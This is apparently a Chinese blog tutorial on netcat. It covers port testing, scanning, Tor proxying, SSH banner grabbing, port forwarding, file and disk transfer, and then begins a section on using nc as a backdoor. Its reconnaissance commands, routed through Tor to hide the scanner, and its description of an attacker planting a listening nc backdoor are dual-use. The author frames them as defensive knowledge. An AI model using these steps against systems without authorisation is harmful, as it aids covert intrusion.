571 评论

扫盲 netcat(网猫)的 N 种用法——从“网络诊断”到“系统入侵”

  先插播一个“广而告之”
  马上要到【十一沦陷日】,而且这次是朝廷的70大寿。按照以往的经验,GFW 会加大封锁力度。
  再次提醒大伙儿——未雨绸缪,先做准备(具体参见今年六四之前的那篇《翻墙快报》)



★引子


  这些年来,俺在博客上写了若干“信息安全教程”,其中不免会涉及到【网络配置】。
  由于读者中有很多是“技术菜鸟”,经常在配置网络的时候卡壳——有些人是因为粗心,还有些是被系统的防火墙干扰了(误导了)。
  今天这篇,一个主要目的就是:教你如何用 netcat 这个牛逼的小工具进行网络诊断、网络配置、系统管理 ......
  此文的另一个目的是:介绍黑客/骇客是如何利用 netcat 这个工具来辅助入侵。所谓【知己知彼】,注重安全防范的同学,也应该稍微了解一些入侵者的手法。


---------------------
|      /\_/\        |
|     / 0 0 \       |
|    ====v====      |
|     \  W  /       |
|     |     |     _ |
|     / ___ \    /  |
|    / /   \ \  |   |
|   (((-----)))-'   |
|    /              |
|   (      ___      |
|    \__.=|___E     |
|           /       |
---------------------

★netcat 是个啥玩意儿?


  netcat 一般简称为 nc,直译为中文就是“网猫”,被誉为——【网络上的瑞士军刀】。
  它诞生于1995年,在网络安全社区的名气很大(就如同 AK47 在军事领域的名气)。长期在安全圈内混的人,应该都知道它。想当年,insecure.org 网站在本世纪初搞过几次“年度投票”,评选优秀的安全工具。每次投票,netcat 都能排进前几名。
  关于 nc 的更多介绍,请参见维基百科的“这个链接”。


★netcat 能干啥?


◇概述


  简而言之,nc 是一个【命令行】工具,能够让你很方便、很灵活地地操纵【传输层协议】(TCP & UDP)。
  考虑到本文的读者中,有些是技术菜鸟,稍微普及一个小知识

================================ 华丽的分割线 ================================

  在谈到“网络协议分层”这个话题时,有一个大名鼎鼎的“OSI 7层模型”(维基百科的链接在“这里”)。这个模型相当牛逼,任何一种具体的网络协议实现,都可以套用其中。
  在如今这个互联网时代,大伙儿经常听说的“TCP/IP 协议”以及周边的协议,也可以套用到“OSI 7层模型”之上。大致如下:

层次名称协议举例
7应用层(注:位于这层的协议非常多。
比如:HTTP、DNS、FTP、SMTP、POP3、SSH ......
与用户直接打交道的,大都在这层)
6表示层(注:这层的协议很少见,此处省略)
5会话层SOCKS(代理)
PPTP(常用于:VPN)
命名管道(常用于:进程间通讯)
NetBIOS
4传输层TCP(传输控制协议)
UDP(数据报协议)
3网络层IP(互联网协议)
ICMP(互联网控制消息协议)
IGMP(互联网组管理协议)
IPSec(常用于:VPN)
2链路层MAC(常用于:以太网、移动通讯、等)
ARP & RARP(MAC 地址的解析与反向解析)
SLIP、PPP、PPPoE(常用于:拨号上网)
L2TP(常用于:VPN)
1物理层USB 协议
蓝牙协议
RS-232(串口标准协议)

================================ 华丽的分割线 ================================

  基于上述“小知识”,当你听到“IP 地址”这个词的时候,指的是“OSI 第3层”;相应的,“MAC 地址”指的是“OSI 第2层”。

◇nc 的变种


  由于 nc 是如此牛逼,而它本身又很小(不但软件很小,源代码也很少)。很容易就衍生出一大堆【变种】。不同的变种,会在原有 nc 的基础上增加一些新功能。
  由于变种之间存在差异。在本文的开头部分,俺有必要先声明一下:这篇教程的内容,主要基于 OpenBSD 社区的变种(也叫“OpenBSD netcat”或“netcat-openbsd”)
  顾名思义,这是由 OpenBSD 社区重写的 netcat,主要增加了对“IPv6、proxy、Unix sockets”等功能的支持。另外,在细节上也有若干完善。
  虽然它出自 OpenBSD 社区,但很多主流 Linux 发行版的官方软件仓库已包含这个变种(比如说:Debian 家族、Arch 家族、openSUSE 家族、Gentoo 家族......)。
  “OpenBSD netcat”官网的帮助页面在“这里”,其官方代码仓库在“这里”。截止俺写本文时,其版本为 1.206,上个月刚更新(看 commit history,更新还挺勤快滴)
  为了打字省力,本文后续部分提到的 nc,除非专门注明,否则都是指:netcat 的 OpenBSD 变种。如果俺要称呼原始的那个 netcat,俺会称之为“原版 nc”(洋文叫做“traditional netcat”)。
  另,
  在本文末尾,俺单独开一个章节,简单聊聊 nc 的其它几个变种。


★nc 命令行简介


  要使用 nc,你就需要在【命令行】中与它打交道(它所有的功能,都以命令行的方式呈现给你用)。

◇nc 命令行的常规形式


  一般来说,nc 的命令行包括如下几个部分:
nc 命令选项 主机 端口
  命令选项
  这部分可能包含 0~N 个选项
  (注:这部分最复杂,下一个小节单独聊)
  主机
  这部分可能没有,可能以“点分十进制”形式表示,也可能以“域名”形式表示。
  端口
  这部分可能没有,可能是单个端口,可能是端口范围。
  对于“端口范围”,以两个数字分别表示“开始和结束”,中间以【半角减号】相连。举例:1-1024

◇何为“命令行选项”?


  简单来说,nc 提供了一大堆【命令行选项】,分别对应它提供的功能。每个选项都是“单字母”滴。有些选项需要带【选项值】,有些不需要。
  你要使用的选项都放在 nc 这个命令之后,每个选项前面要有一个【半角减号】,选项之间以空格分开。
  举例:
  在下面这个例子中,分别用到了三个选项(l、p、v),其中 12345 是选项 p 所带的【选项值】。
nc -l -p 12345 -v

  如果你的系统中已经有 nc(且 nc 已添加到【PATH 环境变量】),在命令行中执行如下,就可以看到它支持的全部命令选项的列表。
nc -h

  顺便说一下:在上述命令的输出中,如果第一行包含 OpenBSD 这个单词,就说明你当前用的“网猫”是 OpenBSD 变种。

◇【常用的】命令行选项


  由于上述命令显示的帮助是洋文。为了照顾新手,俺稍作解释(只列出【常用的】那些)。
选项是否有“选项值”说明
hNO输出 nc 的帮助
vNO在网络通讯时,显示详细的输出信息
注:建议新手多用该选项,出错时帮你诊断问题
nNO对命令行中的“主机”,【不】进行域名解析
注:如果“主机”是“点分格式”的 IP 地址,需要用该选项;
如果“主机”是“域名”形式,【不能】用该选项
pYES指定“端口号”
lNO开启“监听模式”,nc 作为【服务端】
注:如不加该选项,nc 默认作为客户端
uNO使用 UDP 协议
注:如不加该选项,默认是 TCP 协议
wYES设置连接的超时间隔(N 秒)
qYES让 nc 延时(N 秒)再退出
zNO开启“zero-I/O 模式”
注:该选项仅用于“端口扫描”,后面会聊到
kNO配合 -l 选项使用,可以重复接受客户端连接。
注:“原版 nc”的该选项用来开启“TCP keepalive”
这是“原版 nc”与“OpenBSD 变种”之间的差异之一
XYES指定代理的类型(具体用法,后面会聊到)
注:“原版 nc”【没有】该选项。这是“原版 nc”与“OpenBSD 变种”之间的差异之一
xYESIP:port 的格式指定代理的位置。
注:“原版 nc”【没有】该选项。这是“原版 nc”与“OpenBSD 变种”之间的差异之一
eYES启动某个进程,把该进程的“标准输入输出”与网络通讯【对接】
注:通常用该选项开启一个网络后门
“OpenBSD 变种”基于安全考虑,已去掉该选项,
但还是能用间接的方式达到同样的效果 :)

  汇总上述表格,只是用来【速查】。俺会在后续章节具体介绍每个命令选项的详细用法。

◇命令行选项的【合写】形式


  有时候要同时用到多个选项,可以“合写在一起”,在前面共用一个【半角减号】。
  还拿刚才俺举的例子,以下几种写法是【等价】滴。
nc -lp 12345 -v
nc -l -v -p 12345
nc -lv -p 12345
nc -lvp 12345

◇如何强行终止 nc?


  一般来说,在命令行环境下,你可以用【Ctrl C】这个组合键来强行终止当前运行的进程。
  对 nc,你同样可以这么干。


★招数1:(网络诊断)测试某个远程主机的【监听】端口是否可达


◇使用场景


  经常有这种需求,要判断某个主机的监听端口是否能连上。
  导致监听端口【无法】,通常有两种原因:
其一,这个监听端口根本就【没开启】;
其二,监听端口虽然开启,但是被防火墙阻拦了。
  对第1个原因,(如果你能在该主机上运行命令)可以直接用 netstat 这个命令查看监听端口是否开启(不懂 netstat 命令的同学,可以看这篇博文
  但对于第2个原因,netstat 就用不上了。这时候就可以用 nc 来帮你搞定。

◇方法


  用如下命令可以测试某个 IP 地址(x.x.x.x)上的某个监听端口(xx)是否开启。
nc -nv x.x.x.x xx

  上述命令用到了如下几个选项:

  选项 -v
  如果你是 nc 的新手,俺建议总是带上这个选项——通过更详细的输出,能帮你搞明白状况。
  在本文后续的举例中,俺会尽量都加上这个选项(但这段话就不再重复唠叨啦)

  选项 -n
  由于测试的是【IP 地址】,用该选项告诉 nc,【无须】进行域名(DNS)解析;
  反之,如果你要测试的主机是基于【域名】,就【不能】用“选项 -n”。

◇补充说明:超时设置


  在测试链接的时候,如果你【没】使用 -w 这个超时选项,默认情况下 nc 会等待很久,然后才告诉你连接失败。
  如果你所处的网络环境稳定且高速(比如:局域网内),那么,你可以追加“-w 选项”,设置一个比较小的超时值。在下面的例子中,超时值设为3秒。
nc -nv -w 3 x.x.x.x xx

◇补充说明:UDP


  通常情况下,要测试的端口都是 TCP 协议的端口;如果你碰到特殊情况,需要测试某个 UDP 的端口是否可达。nc 同样能胜任。只需要追加 -u 选项。


★招数2:(网络诊断)判断防火墙是否“允许 or 禁止”某个端口


◇使用场景


  前一个章节(招数1)的场景是——已经有某个网络软件开启了监听端口,然后用 nc 测试端口是否可达。
  现在换另一个场景:
  假设你正在配置防火墙规则,禁止 TCP 的 8080 端口对外监听。那么,你如何【验证】自己的配置是 OK 滴?
  更进一步说:如果当前【没有】任何软件开启 8080 这个监听端口,你如何判断:该端口号是否会被防火墙阻拦?
  为了叙述方便,设想如下场景:
有两台主机——“主机C”充当客户端,“主机S”充当服务端。
然后要判断“主机S”上的防火墙是否会拦截其它主机对 8080 TCP 端口的连接。

◇方法


  在“主机S”上运行 nc,让它在 8080 端口,命令如下:
nc -lv -p 8080

  选项 -l
  这个选项会让 nc 进入监听模式。

  选项 -p
  这个选项有“选项值”,也就是具体端口号。

  然后在“主机C”上运行 nc,测试“主机S”上的 8080 端口是否可达(具体的命令行参见前一章节“招数1”)

◇补充说明:是否省略“-p”?


  某些 nc 的变种,在开启监听模式时,可以省略“-p”,上述命令变为如下:
nc -lv 8080
  但考虑到兼容性,(在后续章节中)俺总是写上 -p 选项。

◇补充说明:如何让 nc 的监听端口【持续开启】


  在默认情况下,nc 开启 listen 模式充当服务端,在接受【第一次】客户端连接之后,就会把监听端口关闭。
  为啥会这样捏?因为当年设计 nc 更多的是作为某种网络诊断/配置工具,并【不是】真拿它当服务端软件来用的。
  如果你想要让 nc 始终监听模式,使之能【重复】接受客户端发起的连接,可以追加 -k 选项。

◇补充说明:UDP


  上述举例是基于 TCP 协议。如果你要测试 UDP 协议,要记得【两边】的 nc 都要追加 -u 选项。


★招数3:(渗透测试)用 nc 玩“端口扫描”


◇使用场景


  在“招数1”里面介绍了:如何测试【单个】端口是否可达。
  扩展一下:如果你要测试的不止一个端口,而是某个【范围】的端口。这种行为有个专门的术语叫【端口扫描】。
  “端口扫描”是一把双刃剑——“黑帽子”用这招进行信息收集,为后续的入侵做铺垫;“白帽子”用这招来进行“渗透测试”,以排查自己系统中【尚未屏蔽】的对外监听端口。
  作为一款牛逼的网络瑞士军刀,nc 当然可以用来干这事儿啦。
  顺便说一下:
不论是 TCP 还是 UDP,协议规定的【有效】端口号范围都是:1 ~ 65535

◇方法


  下面这个命令,用来扫描 IP 地址为 x.x.x.x 的主机,扫描的端口范围从 11024
nc -znv x.x.x.x 1-1024

  选项 -z
  意思是:开启“zero-I/O 模式”。该模式指的是:nc 只判断某个监听端口是否能连上,连上后【不】与对端进行数据通讯。
  选项 -n
  (前面已聊过,参见“招数1”)
  选项 -v
  -v 选项前面也聊过,这里要特地强调一下。
  对 nc 的其它用法,-v 选项是可加可不加滴;但对于“端口扫描”而言,一定要有这个选项——否则你【看不到】扫描结果。

◇补充说明:优化输出


  玩“端口扫描”的时候,“-v 选项”会把“成功/失败”的结果统统打印出来。
  通常大伙儿关注的都是“扫描成功”的那些端口。因此,可以用如下命令过滤一下,只打印扫出来的端口。
nc -znv x.x.x.x 1-1024  2>&1 | grep succeeded
  由于“-v 选项”产生的输出位于【stderr】,上述命令中的 2>&1 用来把【stderr】合并到【stdout】(注:这种写法只适用于 POSIX 系统上的 shell)
  grep 命令用来进行【过滤】。对于 Windows 系统,默认【没有】grep 命令,需改用 find 命令过滤。

◇补充说明:超时设置


  如果你要扫描的端口范围,跨度比较大,超时值要【恰到好处】——
超时值太大,会浪费时间;超时值太小,可能会遗漏某些端口(端口本身开放,但 nc 还没来得及连上就超时了)
  具体如何设置,参见“招数1”的“补充说明”。

◇补充说明:【并发】扫描


  如果你设置了较小的超时值,依然嫌慢,还可以用【并发】扫描的方式,进一步提升效率。
  简而言之就是:同时运行多个 nc,分别扫描不同的端口范围。


★招数4:(隐匿性)如何让 nc 走暗网(以 Tor 为例)


◇使用场景


  (本章节针对那些有【特殊需求】的家伙。技术菜鸟可以略过)
  如果你想用 nc 干一些“不为人知”的事情,首先要考虑的是——如何消除【网络层面】的踪迹。
  最容易想到的当然就是——让 nc 走暗网(比如 Tor)。本文以下部分称之为【nc over Tor】。
  顺便说一下:“原版 nc”【不支持】代理,而 nc 的“OpenBSD 变种”支持各种代理。这是两种 nc 之间的关键性差异之一。

◇方法


  为了支持代理,nc 的“OpenBSD 变种”增加了两个选项:-X-x

  选项 -x
  该选项表示【代理的位置】,以 x.x.x.x:xxx 的形式表示(中间是【半角冒号】)。

  选项 -X
  该选项表示【代理的类型】,含义如下:
选项值含义
5SOCKS5 代理
4SOCKS4 代理
connectCONNECT 型的 HTTP 代理
  上述这几种类型的代理,功能上有啥差异,参见下面这篇博文开头部分的★预备知识章节。
如何让【不支持】代理的网络软件,通过代理进行联网(不同平台的 N 种方法)

  首先,确保你本机已经运行了 Tor;
  然后,拿俺的域名测试一下。如果 nc 的输出中包含 succeeded(参见下面的第2行),说明 OK 啦——nc 已经能通过 Tor 联网。
nc -X 5 -x 127.0.0.1:9050 -q 3 -v program-think.blogspot.com 443

Connection to program-think.blogspot.com 443 port [tcp/https] succeeded!
(注:如果你用的是“Tor Browser”,上述命令中的“-x 选项值”改为 127.0.0.1:9150

◇补充说明:延时退出


  在上述举例中,俺用到了一个新的 -q 选项。主要考虑到:本博客的 Web Server 位于【公网】。
  当你用 nc 连接【公网】上的服务器,考虑到网络环境的诸多因素,最好加 -q 选项,让 nc【延时】退出。
  在俺的示例中,延时3秒。实际操作时,要根据你的网络环境调整。

◇补充说明:Tor 暗网的好处


  关于 Tor 的用处/好处,俺在博客上重复唠叨的次数,已经数不清了。
  (简而言之)由于 Tor 暗网的线路会经历“三级跳”&“三重套”,而且其线路每隔10分钟就会【随机】变换一次。这种变态的玩法,可以让【网络层面】的逆向追溯变得非常非常困难。
  对这方面的更多介绍,参见:《关于 Tor 的常见问题解答

◇补充说明:域名解析


  当你用刚才的招数做到【nc over Tor】之后,一旦 nc 的网络行为需要解析域名,会自动通过 Tor 的 SOCKS 代理进行【远程域名解析】。
  也就是说,“DNS 协议”相关数据流也经过 Tor 暗网——这样既可以【防止】“域名解析”暴露你的网络行为,还可以避免 GFW 的“域名污染”。
  关于“DNS 协议”的引申阅读,可以看如下几篇:
扫盲 DNS 原理,兼谈“域名劫持”和“域名欺骗/域名污染”
对比4种强化域名安全的协议——DNSSEC,DNSCrypt,DNS over TLS,DNS over HTTPS

◇补充说明:设置别名(alias)


  如果你比较懒,觉得每次都输入上述两个代理选项太麻烦,可以为 nc 设置一个【别名】(命令如下)
alias nc-tor='nc -X 5 -x 127.0.0.1:9050'
  设置好之后,你只要用 nc-tor 就可以自动追加代理选项。
  如果想让别名【永久】生效,要把上述命令加入到:你当前使用的 shell 的启动文件中。
  再次唠叨:“裸 Tor”与“Tor Browser”的监听端口有差异。俺上述命令的 9050 是用于“裸 Tor”。


★招数5:(信息收集)用 nc 探测“服务器类型”和“软件版本”(以 SSH 为例)


◇使用场景


  (本章节针对那些有【特殊需求】的家伙。技术菜鸟可以略过)
  入侵者在发起攻击之前,有一个很重要的步骤叫做【信息收集】。攻击者对目标了解得越多,得手的机会就越大。
  下面俺以 SSH Server(sshd)举例。

◇方法


  如今要【远程管理】服务器,最常用的大概就是 SSH 这种方式了。
  如果某个服务器运行了 SSH 服务端(默认监听端口是 22),那么用如下命令可以看出:该服务器的操作系统类型,以及 SSH server 的版本。
echo "EXIT" | nc-tor -vq 5 -n 服务器IP 22
echo "EXIT" | nc-tor -vq 5 服务器域名 22

  选项 -v
  玩这招时,最好加 -v 选项——nc 会先显示“端口已经连上”或者“端口连不上”。

  选项 -q
  (关于该选项的说明,参见“招数4”章节的【延时退出】)

  nc-tor 别名
  (关于这个别名,已经“招数4”章节聊过——是让 nc 走 Tor 代理)

  前面聊了这么久,一直没有给出【实例】。现在来一个【真实的】例子——用 nc 探测 Github 的 SSH 端口
  (注:在如下终端窗口中,头一行是命令,后面两行是输出)
echo "EXIT" | nc-tor -vq 5 ssh.github.com 22

Connection to ssh.github.com 22 port [tcp/ssh] succeeded!
SSH-2.0-babeld-dae25663

◇补充说明:echo 命令


  上述用到的 echo 命令是 POSIX 下常用的命令。Windows 的命令行中也有同名的命令,但功能/用法有【差异】。

◇补充说明:批处理 & 自动化


  某些“有心人”甚至可以搞一个脚本,批量探测某个 IP 地址段的 22 端口,然后把找到的服务器信息保存在某个文件中。
  另外,
  有的系统管理员会把 sshd 的监听端口从 22 改为其它数值,想要迷惑攻击者。但这么干,【效果不大】。
  攻击者可以先进行端口扫描,拿到所有已开启的 TCP 监听端口;然后利用上述方法,对这些 TCP 端口进行【自动化】探测,从而判断出哪个端口是 SSH Server。

◇补充说明:防范措施


  本章节以“SSH Server”举例来说明入侵者如何探测服务端的软件版本。
  除了“SSH Server”,很多其它的服务端软件,也存在类似的【信息暴露】。
  一个谨慎的系统管理员,应该通过定制,【消除 or 伪造】这些信息,从而增加入侵者的攻击成本。


★招数6:(隐匿性)用 nc 实现【彻底无痕】的 Web 访问


◇使用场景


  (本章节针对那些有【特殊需求】的家伙。技术菜鸟可以略过)
  有时候,俺想要看某个 Web 服务器上的某个页面的内容,但是又【不希望】在那上面留下俺本人的任何痕迹。这里所说的“痕迹”既包括【网络】层面滴,也包括【操作系统 & 软件】层面滴。
  要搞定【网络】层面,很简单——主要靠【暗网】(Tor or I2P),来掩盖你的【真实】“公网 IP”。具体的玩法,前面章节已经聊过啦。
  要搞定【操作系统 & 软件】层面,稍微麻烦一点。如果你用传统的浏览器(Chrome、Firefox、IE、Edge ...)访问了某个页面。即使你禁用了 JS,伪造了浏览器的“User Agent”。但如果 Web 服务器想要收集你的系统指纹,还是有若干办法——可以通过浏览器的一些差异,获得某些信息量(安全行话叫做“浏览器指纹”)。
  比如说:HTTP 协议的【Header】字段可能会包含某些信息。
  比如说:不同内核的浏览器,对页面的渲染会有差异。对页面中的【外部】元素(图片、JS、CSS ...)的加载效率也会有差异。
  比如说:即使同一款浏览器,在不同系统平台上,依然会表现出某些差异。
  ......
  引申阅读:
关于“浏览器指纹”的深入讨论,可以看《如何保护隐私》系列教程的其中几篇。

  此时,nc 再度派上用场——你可以用 nc 直接抓取页面,保存到本机。
  这种玩法相当于——让 nc 在【裸 TCP】层面执行 HTTP 协议的命令。在整个过程中,浏览器完全【不】参与其中。既【不会】暴露浏览器的信息,也【不会】暴露操作系统的信息。

◇方法


  先执行下列两个命令的其中一个(具体看你想用“IP”还是“域名”)
echo -e "GET / HTTP/1.0\r\n\r\n" | nc-tor -vq 5 服务器域名 端口
echo -e "GET / HTTP/1.0\r\n\r\n" | nc-tor -vq 5 -n 服务器IP 端口

  然后 nc 就会把这个页面抓下来,打印到命令行终端。这时候你看到的是【HTML 源代码】。

  上述命令访问的是 Web Server 的【根路径】。如果你想要看其它路径的页面(比如说:/index.html),稍微修改成如下:
echo -e "GET /index.html HTTP/1.0\r\n\r\n" | nc-tor -vq 5 服务器域名 端口
echo -e "GET /index.html HTTP/1.0\r\n\r\n" | nc-tor -vq 5 -n 服务器IP 端口

  由于正常人类是无法直接阅读【HTML 源代码】滴。为了更加人性化,你可以把 nc 抓下来的 HTML 源代码,(在命令行中用“大于号”)重定向到某个 HTML 文件,然后就可以用你本机的浏览器阅读之。

  nc-tor 别名
  (关于这个别名,已经“招数4”章节聊过——是让 nc 走 Tor 代理)

  选项 -q
  (关于该选项的说明,参见“招数4”章节的【延时退出】)

◇补充说明:HTTP 协议


  协议版本
  有些同学会奇怪——为啥俺上述的示例用的是 1.0 而不是 1.1?
  主要是为了偷懒——按照 RFC 的规范,HTTP 1.1 的 Request 中,Host 是【必须】的字段;而在 HTTP 1.0 中,这个字段是【可选】滴。

  HTTPS
  nc 的“OpenBSD 变种”还【不】支持 HTTPS(SSL/TLS)。
  在本文末尾介绍的其它变种里面,ncat & socat 已经完全支持 SSL/TLS 协议。
  由于本文主要介绍 nc 的“OpenBSD 变种”,关于 ncat & socat 的话题,就不展开啦。

◇补充说明:这种方式的【缺点】


  关于“页面的【外部】元素”
  用这招,nc 只抓取页面本身,不包括页面中的外部元素(图片、JS、CSS ...)。
  这种方式拿到的页面,阅读的时候会显得比较丑陋(你就凑合着看吧)

  关于“JS 引擎”
  由于这招只是在 TCP 层面模拟了简单的 HTTP 协议。所以只能得到【静态 HTML】。
  如果某个页面的内容是依靠【前端 JS】动态生成(所谓的 AJAX 风格),那这招就不灵啦(因为 nc【没有】JS 引擎)。


★招数7:(网络配置)基于 nc 的端口转发(Port Forward)


◇使用场景


  说到【端口转发】,俺在6年前(2013)已经专门写过一篇扫盲教程(如下)。
多台电脑如何【共享】翻墙通道——兼谈【端口转发】的几种方法
  关于【端口转发】的相关概念,有啥用处和好处,那篇都已经写了。这里就不再重复唠叨啦。
  在当年那篇教程中,俺主要聊了两个工具,分别是是 rinetd 和 netsh。当年为啥没有介绍 netcat 捏?因为 nc 的功能太强,所谓“杀鸡焉用牛刀”。相比之下,rinetd 的使用非常简单,而 netsh 是 Windows 内置滴工具。
  今天就把当年没聊的给补一下——如何用 nc 玩“端口转发”。

◇原理


  用 nc 进行端口转发,需要运行【两个】nc 进程,一个充当“服务端”,另一个是“客户端”,然后用【管道】让把两个进程的“标准输入输出”交叉配对。所谓的“交叉配对”就是——每一个 nc 进程的“标准输出”都【对接】到另一个 nc 进程的“标准输入”。如此一来,就可以完美地建立【双向通讯】。
  玩过命令行的同学,应该都知道:大部分 shell 都支持【管道符】(就是那个竖线符号 |),可以把某个进程的标准输出,重定向给另一个进程的标准输入。但是 shell 的“管道符”只能做到“单向配对”,【无法】做到“交叉配对”。所以还需要再借助另一个管道——也就是“命名管道”。
  “命名管道”洋文叫做“named pipe”,是一种进程间通讯(IPC)的机制。顾名思义,“命名管道”就是有名号滴,而 shell 中使用的那个【管道符】,其本质上是“匿名管道”(无名管道)。
  主流的操作系统(Windows、Linux、UNIX)都支持“命名管道”这种机制。由于俺本人的环境是 Linux,下面只以 Linux 举例。

◇方法


  步骤1:创建命名管道
  用下面这个简单的命令创建一个“命名管道”,其名称叫做 nc_pipe。(俺用这个名称只是为了举例,你也可以用别的名称)
mkfifo nc_pipe

  步骤2:同时启动两个 nc
nc -l -p 1234 < nc_pipe | nc 127.0.0.1 5678 > nc_pipe
  运行上述命令之后,就可以把本机的 1235 端口重定向到本机的 5678 端口。

  这个命令有点复杂。技术菜鸟如果看不懂,就算了(没关系滴,不影响你看后续的章节)。
  如果你比较喜欢刨根问底,俺稍微解释一下:
  上述命令行中,前一个 nc 充当【服务端】,后一个 nc 充当【客户端】。命令行中的“管道符”使得“服务端 nc”的输出绑定到“客户端 nc”的输入。然后再用 nc_pipe 这个命名管道做中转,使得“客户端 nc”的输出绑定到“服务端 nc”的输入。从而完成了【交叉配对】。

◇补充说明:如何让 nc 的监听端口【持续开启】


  参见“招数2”章节中的“补充说明”。


★招数8:(网络配置)基于 nc 的代理转发(Proxy Forward)


◇使用场景


  提醒一下:
  【不要混淆】本章节与“招数4”。
  “招数4”聊的是——nc 自己通过代理进行网络访问(nc over Tor)。
  “本章节”聊的是——nc 帮助其它网络软件走代理进行网络访问(XX软件 over nc over Tor)。

  比如说,SSH 是很常用的一个安全工具——用来远程操作服务器。
  在某些特殊场合,俺想要通过 SSH 登录某个服务器,但是又【不希望】服务器记录俺本人【真实的】“公网 IP”(“暴露【真实的】公网 IP”等同于“暴露真实身份”)
  说到这里,很多老读者肯定猜到俺说啥——让 SSH 走 Tor 代理(SSH over Tor)。
  但可惜的是:(POSIX 系统中常用的)OpenSSH 客户端【不支持】SOCKS 代理,而 Tor 默认提供的是 SOCKS 代理。这时候,netcat 就派上用场啦——用 nc 把 SSH 的数据流转发到 Tor 的 SOCKS 代理。

◇方法


  2016年开两会的时候,俺在 Github 上开源【太子党关系网络】。之后,专门写了一篇教程(如下),介绍如何【隐匿地】访问 Github 仓库。
使用 GitHub 的几种方式——兼谈安全性和隐匿性的经验
  由于 Github 同时提供了几种不同的访问途径(Web、Git、SSH)。对【每一种】Github 的访问方式,俺都介绍了相应的隐匿措施。
  对 SSH 这种访问方式,当时俺介绍的招数就是——用 nc 进行代理转发(把 SSH 的数据流转发到 Tor)
  既然当年已经聊过了,这里就不重复唠叨啦。对这招感兴趣的同学,请猛击上述链接。

◇补充说明:“SSH over Tor”与“Tor over SSH”


  即使懂技术的同学,有时候也会混淆这两者。俺顺便澄清一下:
  Tor over SSH
  这种方式相当于 SSH 作为 Tor 的前置代理。假设你有一个墙外的 SSH server,而且没有被 GFW 屏蔽,就可以用这招,让你的 Tor 客户端通过这个 SSH server 联网。
  SSH over Tor
  这是让 SSH 通过 Tor 网络(暗网)连接到 SSH 服务器,从而隐藏 SSH 客户端的【真实】公网 IP。在这种情况下,SSH 服务器看到的访问者 IP 是“Tor 出口节点的公网 IP”。


★招数9:(系统管理)用 nc 传输文件


◇使用场景


  有时候,你需要在两台电脑之间传输文件。也可以用 nc 搞定。
  俺猜到某些技术小白会问:为啥不用 Windows 的共享目录?
  反驳的理由很多——
反驳1:这个玩意儿只能在 Windows 上用。
反驳2:为了使用“共享目录”,需要启用(Enable)系统中的好几个 service,这会增加你系统的【攻击面】。
反驳3:启用的 service 越多,占用的内容也越多,影响性能。
......
  还有些同学会问:为啥不用 FTP、SSH(或诸如此类的东东)?
  俺觉得:
1、如果只是临时传一个文件,还要额外再去装某某软件的客户端/服务端,岂不是很蛋疼?
2、任何服务端软件,(从某种意义上说)都是在【增加攻击面】。

◇方法


  为了叙述方便,假设你有两台主机 A 与 B,你要把 A 主机上的文件 file1 传输到 B 主机上,保存为 file2

  你先在【接收端】(B 主机)运行如下命令(其中的 xxx 是端口号)
nc -l -p xxx > file2

  然后在【发送端】(A 主机)运行如下命令。
nc x.x.x.x xxx < file1
  第二条命令中的 xxx 是端口号,要与第一条命令中的端口号相同;第二条命令中的 x.x.x.x 是【主机 B】的 IP 地址。

◇补充说明:nc 的性能优势


  用 nc 传输文件,相当于是:直接在【裸 TCP】层面传输。你可以通俗理解为:【没有】应用层。
  (不熟悉网络分层的同学,再去复习一下本文开头的 OSI 模型)
  如果你传输的文件【超级大】或者文件数量【超级多】,用 nc 传输文件的性能优势会很明显(相比“FTP、SSH、共享目录...”而言)


★招数10:(系统管理)用 nc 远程备份整个磁盘


◇使用场景


  当你学会“用 nc 传输文件”,还可以用 nc【复制整个硬盘】。
  无论是对“系统管理员”,还是对“入侵者”甚至是“数据取证人员”,这招都是蛮有用滴。

  考虑到某些读者是“技术菜鸟”,俺稍微说明一下。
  “磁盘复制”【不同于】“在两块磁盘之间复制文件”。两者之间有很多差别,至少包括:
  性能差异——如果“源盘”上有非常多的小文件,“在两块磁盘之间复制文件”就会【非常慢】。
  完整性差异——“磁盘复制”可以确保两块盘的内容是完全一致滴。而如果你仅仅在两块磁盘之间复制文件,很多信息都损失掉了。
  一般来说,“系统管理员”和“入侵者”更看重第1个差异(性能);而“数据取证人员”更看重第2个差异(完整性)。

◇原理


  为了传输整个磁盘,你需要用到 dd 命令。这玩意儿源自 UNIX,后来也移植到 Linux 和 Windows。
  俺曾经在如下博文中稍微介绍过 dd 命令的使用。
如何用 ISO 镜像制作 U 盘安装盘(通用方法、无需 WinPE)
  关于 dd 命令的更详细介绍,可以参见“维基百科”(这里)或“Gnu 官网”(这里)。

  通过 dd 命令,你可以把“整个硬盘”(或者硬盘上的某个“物理分区”、“逻辑分区”)dump 成一个文件。
  在本章节,由于最终目的是要【跨主机备份磁盘】,所以并【不】需要真的把 dd 命令的输出保存成文件,而是把 dd 的输出通过管道符(|)重定向给【本机】的 nc,然后让【本机】的 nc 发送到另一台主机的 nc(参见前一个招数)。

◇方法


  由于操作物理磁盘会涉及到操作系统的差异,下面俺以 Linux 举例。
  假设你要把 A 主机 /dev/sda 磁盘的【原始数据】整个复制到 B 主机的 /dev/sdb 磁盘。

  你先在【接收端】(B 主机)运行如下命令(其中的 xxx 是端口号)
nc -l -p xxx | dd of=/dev/sdb

  然后在【发送端】(A 主机)运行如下命令。
dd if=/dev/sda | nc x.x.x.x xxx
  第二条命令中的 xxx 是端口号,要与第一条命令中的端口号相同;第二条命令中的 x.x.x.x 是【主机 B】的 IP 地址。

◇补充说明:nc 的性能优势


  如今的存储设备越来越大了。“磁盘”或者“分区”,动不动都是几百个 GB,这时候 nc 的【性能优势】就体现出来啦。
  (具体的原因,前一个章节已经分析过了)


★招数11:(入侵手法)用 nc 开启【被动】连接型后门


  既然聊 netcat,很自然地会聊到“黑客/骇客”的入侵招数。
  做这方面的介绍,并【不是】为了传授入侵技巧;而是为了——让那些注重安全性的同学,能做到“知己知彼”。

◇使用场景


  假设1:你使用的浏览器存在某个安全漏洞,并且该漏洞会让攻击者获得【执行代码】的机会。
  假设2:你在某个公共场合使用某个 wifi 热点上网。遗憾的是,这个热点是攻击者设置的陷阱。
  假设3:设置该陷阱的攻击者,正好也知道:如何利用上述漏洞。
  当这三个假设都成立,攻击者就可以获得在你【本机】执行代码的机会。这时候,攻击者可以下载一个 nc 到你本机,然后用 nc 开启一个【被动】连接型后门。所谓的“【被动】连接型”就是指——nc 开启对外监听端口。
  在该场景中,因为攻击者与你处于【同一个局域网】,攻击者自然能从自己的机器访问到你本机的 nc 后门。

◇原理


